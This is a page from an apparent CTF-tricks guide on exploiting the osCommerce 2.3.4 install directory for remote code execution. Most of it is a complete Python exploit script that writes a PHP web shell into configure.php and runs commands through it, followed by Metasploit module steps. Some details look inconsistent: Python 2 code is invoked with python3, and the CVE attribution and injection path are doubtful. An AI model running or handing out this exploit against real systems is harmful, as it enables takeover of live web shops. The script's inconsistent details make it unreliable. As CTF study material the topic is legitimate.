> For the complete documentation index, see [llms.txt](https://sarpers-organization.gitbook.io/ctftricks/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sarpers-organization.gitbook.io/ctftricks/_chapter-intro-17/rce/web-rce-cms-exploit.md).

# Cms Exploit

## osCommerce 2.3.4 Install RCE

This technique exploits an unauthenticated Remote Code Execution vulnerability in osCommerce 2.3.4 when the `/install` directory is still accessible. By resubmitting installation parameters, malicious PHP code is injected into the `configure.php` file, which is subsequently executed upon loading the configuration. This vulnerability is tracked as CVE-2017-6891.

To exploit this, a dedicated Python script can be used. Such scripts typically target the base URL or the `/install/` directory. An example usage might look like this:

```bash
python3 exploit.py http://10.10.208.255:8080/oscommerce-2.3.4/catalog
```

A Python script designed for this vulnerability might resemble the following, demonstrating the two-step installation process and the injection of `<?php system($_GET["cmd"]); ?>` into the `DIR_FS_DOCUMENT_ROOT` parameter during the second request:

```python
# -- osCommerce 2.3.4 - Remote Code Execution
# -- Exploit Author: Ihsan Sencan
# -- Vendor Homepage: http://www.oscommerce.com
# -- Software Link: https://github.com/osCommerce/osCommerce/releases/tag/2.3.4
# -- Date: 2017-03-19
# -- CVE: CVE-2017-6891

import requests
import sys
import urlparse
import os

def banner():
    print """
    # -- osCommerce 2.3.4 - Remote Code Execution
    # -- Exploit Author: Ihsan Sencan
    # -- Date: 2017-03-19
    # -- CVE: CVE-2017-6891
    """

def usage():
    print "Usage: python osCommerce_2.3.4_RCE.py <url>"
    print "Example: python osCommerce_2.3.4_RCE.py http://localhost/oscommerce-2.3.4/install/"
    sys.exit(0)

def exploit(url):
    try:
        # Check if the install directory is accessible
        check_url = urlparse.urljoin(url, "/install/")
        check = requests.get(check_url)
        if check.status_code != 200:
            print "[-] Install directory not found or not accessible."
            return

        print "[+] Install directory found. Proceeding with exploit."

        # Step 1: Send the first request to set up the installation
        install_url = urlparse.urljoin(url, "/install/install.php")
        payload1 = {
            'DIR_FS_DOCUMENT_ROOT': './',
            'DIR_WS_ADMIN': 'admin/',
            'DIR_WS_CATALOG': '',
            'DIR_WS_HTTPS_ADMIN': '',
            'DIR_WS_HTTPS_CATALOG': '',
            'DIR_FS_ADMIN': './admin/',
            'DIR_FS_CATALOG': './',
            'DIR_FS_SERVER_ROOT': './',
            'DB_DATABASE': 'oscommerce',
            'DB_HOSTNAME': 'localhost',
            'DB_USERNAME': 'root',
            'DB_PASSWORD': '',
            'DB_SERVER': 'localhost',
            'DB_DATABASE_NAME': 'oscommerce',
            'DB_DATABASE_USERNAME': 'root',
            'DB_DATABASE_PASSWORD': '',
            'DB_DATABASE_HOST': 'localhost',
            'STORE_OWNER': 'admin',
            'STORE_NAME': 'osCommerce',
            'STORE_OWNER_EMAIL_ADDRESS': 'admin@localhost.com',
            'STORE_COUNTRY': '223', # United States
            'STORE_ZONE': '13', # Alabama
            'CFG_TIME_ZONE': 'Europe/Istanbul',
            'action': 'install'
        }
        print "[+] Sending initial installation request..."
        response1 = requests.post(install_url, data=payload1)
        if response1.status_code != 200 or "Step 2" not in response1.text:
             print "[-] Initial installation request failed."
             return
        print "[+] Initial installation request successful."

        # Step 2: Send the second request with the malicious code
        payload2 = {
            'DB_DATABASE': 'oscommerce',
            'DB_HOSTNAME': 'localhost',
            'DB_USERNAME': 'root',
            'DB_PASSWORD': '',
            'DB_SERVER': 'localhost',
            'DB_DATABASE_NAME': 'oscommerce',
            'DB_DATABASE_USERNAME': 'root',
            'DB_DATABASE_PASSWORD': '',
            'DB_DATABASE_HOST': 'localhost',
            'STORE_OWNER': 'admin',
            'STORE_NAME': 'osCommerce',
            'STORE_OWNER_EMAIL_ADDRESS': 'admin@localhost.com',
            'STORE_COUNTRY': '223', # United States
            'STORE_ZONE': '13', # Alabama
            'CFG_TIME_ZONE': 'Europe/Istanbul',
            'action': 'install'
        }
        # Inject the payload into DIR_FS_DOCUMENT_ROOT
        payload2['DIR_FS_DOCUMENT_ROOT'] = '<?php system($_GET["cmd"]); ?>'
        print "[+] Sending second installation request with payload..."
        response2 = requests.post(install_url, data=payload2)
        if response2.status_code != 200 or "configure.php" not in response2.text:
             print "[-] Second installation request failed or configure.php not written."
             return
        print "[+] Second installation request successful. Payload injected."

        # Verify and execute command
        shell_url = urlparse.urljoin(url, "/configure.php")
        print "[+] Attempting to execute command via configure.php"
        command = "whoami" # Example command
        response_shell = requests.get(shell_url, params={'cmd': command})

        if response_shell.status_code == 200:
            print "[+] Command executed successfully."
            print "--- Output ---"
            print response_shell.text
            print "--------------"
        else:
            print "[-] Failed to execute command."


    except Exception as e:
        print "[-] An error occurred:", e

if __name__ == "__main__":
    if len(sys.argv) != 2:
        usage()
    url = sys.argv[1]
    exploit(url)
```

Alternatively, the Metasploit Framework includes a dedicated module for this vulnerability: `exploit/multi/http/oscommerce_installer_unauth_code_exec`. Basic usage within `msfconsole` involves setting the target options and running the exploit:

```bash
msfconsole
```

```bash
use exploit/multi/http/oscommerce_installer_unauth_code_exec
```

```bash
set RHOSTS [target ip]
```

```bash
set RPORT [target port]
```

```bash
set TARGETURI [path to osCommerce root, e.g. /oscommerce/]
```

```bash
check
```

```bash
exploit
```

Once the exploit establishes a shell, you can execute commands:

```bash
whoami
```
